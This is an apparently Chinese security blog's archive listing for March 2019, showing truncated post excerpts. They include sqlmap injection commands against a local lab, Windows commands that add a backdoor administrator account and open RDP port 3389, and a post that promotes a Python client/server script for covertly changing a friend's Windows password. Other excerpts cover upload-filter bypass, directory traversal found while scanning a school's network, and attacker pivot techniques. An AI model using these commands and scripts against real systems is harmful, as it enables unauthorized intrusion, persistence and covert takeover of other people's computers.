03 2019 档案
摘要:1 1、检测是否存在漏洞: 2 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 3 2、获取数据库信息: 4 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 --dbs 5 3、数据...
阅读全文
摘要:首先右键点击网上邻居,选择属性,如图: 首先右键点击网上邻居,选择属性,如图: 点击本地连接2,如图: 点击本地连接2,如图: 点击本地连接状态中的“属性”按钮。如图: 点击本地连接状态中的“属性”按钮。如图: 选择“TCP/IPv4”协议,点击下面的“属性”按钮。如图: 选择“TCP/IPv4”协
阅读全文
摘要:1.创建用户chen Net user chen 1234566 /add 2.将用户chen添加到管理员组 net localgroup Administrators chen /add 3.开启3389端口 REG ADD HKLM\SYSTEM\CurrentControlSet\Contro
阅读全文
摘要:今天教大家用python脚本来控制小伙伴们windows电脑的开机密码。没错就是神不知鬼不觉,用random()随机生成的密码,只有你自己知道哦~ 代码呢分两部分,一部分是client端跟server端两个。你只需要想办法让小伙伴运行你的client端脚本就OK啦。不过在此之前你一定要在你的电脑上运
阅读全文
摘要:上传数据包 从数据包中可以看出,验证文件类型的参数有:Content-Type、Filename、Filedata。 客户端JS验证 原理介绍 通过JS验证上传文件类型是最不安全的做法,因为这个方式是最容易被绕过的。我们先来看下JS实现文件检测的代码如下: 客户端JS验证通常做法是验证上传文件的扩展
阅读全文
摘要:某天比较无聊,听一个朋友推荐httpscan这款工具,于是就下载下来试试。 首先对某学校网段开始进行测试。 1 测试时发现有个比较特殊的标题。一般有这个,证明存在目录遍历。 目录遍历这个漏洞,说大也不大,说小也不小,但是,一般来说,存在这种目录,可以证明网站管理员比较粗心,当然也有可能会把一些敏感文
阅读全文
摘要:net user 用户名 密码 /add net localgroup Administrators 用户名 /add
阅读全文
摘要:1、单击桌面左下角的“开始”菜单,弹出的窗口单击“运行”命令;2、在打开框中输入“CMD”命令,单击“确定”,调用出命令提示符窗口;3、在命令提示符窗口下键入以下命令,按回车键;reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
阅读全文
摘要:网络入 侵,安全第一。一个狡猾、高明的入 侵者,不会冒然实行动。他们在**时前会做足功课,**时会通过各种技术手段保护自己,以防被对方发现,引火烧身。其中,跳板技术是攻击者通常采用的技术。下面笔者结合实例,解析攻击入 侵中的跳板技术。 1、确定目标 攻击者在通过扫描工具进行定点(IP)扫描或者对某I
阅读全文